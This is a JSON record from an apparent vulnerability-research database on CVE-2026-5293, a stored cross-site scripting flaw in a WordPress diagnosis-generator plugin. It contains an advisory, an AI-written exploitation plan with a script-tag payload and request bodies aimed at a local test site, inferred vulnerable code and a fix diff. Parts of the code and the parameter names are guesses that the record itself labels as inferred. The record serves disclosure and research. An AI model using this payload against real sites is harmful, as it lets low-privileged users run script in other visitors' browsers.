[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fGPDbrGGYrkccJ8MFJAkl08PeHAGR35ALdvfwGiCvNeM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-5293","authenticated-subscriber-stored-cross-site-scripting-via-js-parameter","診断ジェネレータ作成プラグイン \u003C= 1.4.16 - Authenticated (Subscriber+) Stored Cross-Site Scripting via 'js' Parameter","The 診断ジェネレータ作成プラグイン (Diagnosis Generator) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'js' parameter in versions up to and including 1.4.16. This is due to missing authorization checks and insufficient input sanitization in the themeFunc() function. The function is hooked to 'admin_init' and processes theme update requests without verifying user capabilities, allowing any authenticated user (including subscribers) to save malicious JavaScript to theme files. Additionally, the save() function uses stripslashes() which removes WordPress's magic quotes protection. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in theme files that will execute whenever a user accesses a page containing the diagnosis form shortcode.","os-diagnosis-generator",null,"\u003C=1.4.16","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-19 12:02:54","2026-05-20 01:25:53",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fc5293c0f-90b0-41df-a623-90297d998c41?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-5293\n\n## 1. Vulnerability Summary\n**CVE-2026-5293** is a Stored Cross-Site Scripting (XSS) vulnerability in the **診断ジェネレータ作成プラグイン (Diagnosis Generator)** plugin (versions \u003C= 1.4.16). The vulnerability exists because the `themeFunc()` function, which is hooked to `admin_init`, fails to perform authorization checks (e.g., `current_user_can()`) or nonce verification. \n\nAn authenticated user with Subscriber-level permissions or higher can send a request containing a malicious `js` parameter. The plugin processes this request and saves the input into theme-related configuration files using the `save()` function. Because the `save()` function employs `stripslashes()`, it bypasses WordPress's automatic magic quotes, allowing the injection of arbitrary JavaScript. This payload is subsequently executed in the context of any user (including administrators) who visits a page containing the diagnosis form shortcode.\n\n## 2. Attack Vector Analysis\n*   **Vulnerable Endpoint:** Any WordPress admin path (typically `\u002Fwp-admin\u002Fadmin-ajax.php` or `\u002Fwp-admin\u002Fadmin-post.php`) triggers the `admin_init` hook.\n*   **Vulnerable Function:** `themeFunc()` (inferred to be inside the main plugin file or a theme-handling class).\n*   **Trigger Parameter:** A POST request containing a specific action or identifier to enter the `themeFunc()` logic, plus the `js` parameter.\n*   **Payload Parameter:** `js`\n*   **Authentication:** Authenticated (Subscriber or higher).\n*   **Preconditions:** The plugin must be active. To trigger the XSS on the frontend, a page must contain the plugin's shortcode (typically `[os-diagnosis-generator]`).\n\n## 3. Code Flow\n1.  **Entry Point:** An authenticated user sends a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php`.\n2.  **Hook Execution:** WordPress triggers the `admin_init` hook.\n3.  **Vulnerable Function:** The plugin's registered callback `themeFunc()` executes.\n4.  **Lack of Authorization:** `themeFunc()` fails to check for `current_user_can( 'manage_options' )`.\n5.  **Data Processing:** The code checks for the presence of a 'theme update' trigger (e.g., a specific `$_POST` key).\n6.  **Sanitization Bypass:** The `js` parameter is passed to a `save()` function. This function uses `stripslashes($_POST['js'])`, removing any escaping applied by WordPress core.\n7.  **Persistence (Sink):** The content of the `js` parameter is written to a file (e.g., a template file in `wp-content\u002Fuploads\u002Fos-diagnosis-generator\u002F` or similar) or stored in the database and then written to a script file.\n8.  **Execution:** When the diagnosis form is rendered via shortcode, the stored JavaScript is included in the page output.\n\n## 4. Nonce Acquisition Strategy\nThe vulnerability description explicitly mentions \"missing authorization checks,\" which strongly suggests that the `admin_init` hook lacks both capability checks and nonce verification (`check_admin_referer` or `check_ajax_referer`).\n\nIf a nonce *is* required for the \"theme update\" request, it is likely localized for the plugin's admin interface. \n1.  **Identify Script Handles:** Look for `wp_localize_script` calls in the plugin source (e.g., searching for `os-diagnosis-generator-admin`).\n2.  **Creation of Admin Page:** Since the attacker is a Subscriber, they cannot normally see the plugin's settings page. However, because the hook is on `admin_init`, the logic runs on *any* admin page they can access (like `profile.php`).\n3.  **Bypass Check:** If the plugin code uses `check_admin_referer( 'some_action', 'some_nonce', false )` without checking the return value, the nonce is bypassed.\n\n**Assumed Strategy:** Attempt the exploit without a nonce first. If it fails, search the plugin source for `wp_create_nonce`.\n\n## 5. Exploitation Strategy\nThe goal is to inject a script that will execute when the diagnosis generator is loaded.\n\n### Step 1: Authentication\nLog in as a Subscriber user.\n*   **URL:** `\u002Fwp-login.php`\n*   **Tool:** `http_request`\n\n### Step 2: Identify Injection Trigger\nThe `themeFunc()` function likely looks for a specific POST parameter to initiate the save process. Based on the plugin name and description, we will look for keys like `os_diagnosis_save`, `theme_update`, or `update_js`.\n*(Inferred request parameters based on typical plugin patterns)*:\n*   **Action:** `os_diagnosis_generator_update_theme` (inferred)\n*   **Parameter:** `js`\n\n### Step 3: Send Malicious Request\nSend a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` (or similar) to save the malicious JS.\n*   **Request Method:** `POST`\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:** `action=themeFunc&js=\u003C\u002Fscript>\u003Cscript>alert(document.domain)\u003C\u002Fscript>&(trigger_param)=1`\n    *(Note: The exact 'action' and 'trigger_param' need to be verified by grepping the plugin source for `add_action('admin_init', ...)`)*\n\n### Step 4: Trigger the XSS\nVisit a page containing the plugin's shortcode.\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fdiagnosis-page\u002F`\n\n## 6. Test Data Setup\n1.  **Plugin Installation:** Install and activate `os-diagnosis-generator` \u003C= 1.4.16.\n2.  **User Creation:** Create a Subscriber user.\n    *   `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`\n3.  **Shortcode Page:** Create a public page with the diagnosis shortcode.\n    *   `wp post create --post_type=page --post_title=\"Diagnosis\" --post_status=publish --post_content=\"[os-diagnosis-generator]\"`\n    *   *(Note: Verify the exact shortcode slug by running `grep -r \"add_shortcode\" wp-content\u002Fplugins\u002Fos-diagnosis-generator`)*\n\n## 7. Expected Results\n*   The POST request from the Subscriber user returns a success code (e.g., 200 OK or a redirect).\n*   When navigating to the page created in Step 6, a JavaScript alert box displaying the document domain appears.\n*   Inspecting the page source reveals the injected `\u003Cscript>alert(document.domain)\u003C\u002Fscript>` payload.\n\n## 8. Verification Steps\n1.  **Check Filesystem:** Use WP-CLI to check if a new JS file was created or modified in the plugin's directory or uploads.\n    *   `ls -R wp-content\u002Fuploads\u002Fos-diagnosis-generator\u002F`\n2.  **Check Options:** Check if the JS is stored in the WordPress options table.\n    *   `wp option get os_diagnosis_generator_custom_js` (inferred option name)\n3.  **Verify Frontend Render:** Use `http_request` to fetch the diagnosis page and grep for the payload.\n    *   `http_request(url='http:\u002F\u002Flocalhost:8080\u002Fdiagnosis-page\u002F')` -> search for `alert(document.domain)` in the response body.\n\n## 9. Alternative Approaches\n*   **Parameter Polling:** If the specific trigger parameter for `themeFunc` is unknown, grep the plugin source for `$_POST` inside the function hooked to `admin_init`.\n*   **CSRF:** If the plugin checks for authentication but lacks nonces, an administrator could be tricked into clicking a link that injects the JS payload.\n*   **Shortcode Attribute XSS:** If the `js` parameter injection fails, investigate if the shortcode handler itself reflects attributes without escaping.","The Diagnosis Generator plugin for WordPress (up to version 1.4.16) is vulnerable to Stored Cross-Site Scripting (XSS) via the 'js' parameter. This is caused by the themeFunc() function being improperly hooked to admin_init without capability checks or nonces, combined with the use of stripslashes() which bypasses WordPress's default magic quotes protection.","\u002F* In the main plugin file or theme-handling file *\u002F\nadd_action('admin_init', 'themeFunc');\n\nfunction themeFunc() {\n    \u002F\u002F Vulnerability: No current_user_can() check or nonce verification\n    \u002F\u002F Any authenticated user reaching admin_init (including subscribers) can trigger this\n    if (isset($_POST['js'])) {\n        \u002F\u002F Vulnerability: stripslashes() removes escape characters, allowing raw script tags\n        $js_content = stripslashes($_POST['js']);\n        $this->save($js_content);\n    }\n}","--- a\u002Fos-diagnosis-generator.php\n+++ b\u002Fos-diagnosis-generator.php\n@@ -10,6 +10,13 @@\n function themeFunc() {\n+    if ( ! current_user_can( 'manage_options' ) ) {\n+        return;\n+    }\n+    if ( ! isset( $_POST['_wpnonce'] ) || ! wp_verify_nonce( $_POST['_wpnonce'], 'save_theme_js' ) ) {\n+        return;\n+    }\n+\n     if ( isset( $_POST['js'] ) ) {\n-        $js = stripslashes( $_POST['js'] );\n+        $js = sanitize_textarea_field( stripslashes( $_POST['js'] ) );\n         $this->save( $js );\n     }\n }","The attacker first authenticates as a low-privileged user (Subscriber or higher). They then construct a POST request to any endpoint that triggers the 'admin_init' hook (such as \u002Fwp-admin\u002Fadmin-ajax.php). The payload includes the specific trigger parameter for the themeFunc() logic and the 'js' parameter containing a malicious script (e.g., \u003Cscript>alert(document.domain)\u003C\u002Fscript>). Because the function lacks authorization checks and uses stripslashes(), the payload is saved to the plugin's theme configuration. Finally, the attacker visits a page containing the plugin's shortcode to execute the stored script in the context of other users' browsers.","gemini-3-flash-preview","2026-05-20 17:10:59","2026-05-20 17:11:38",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fos-diagnosis-generator\u002Ftags"]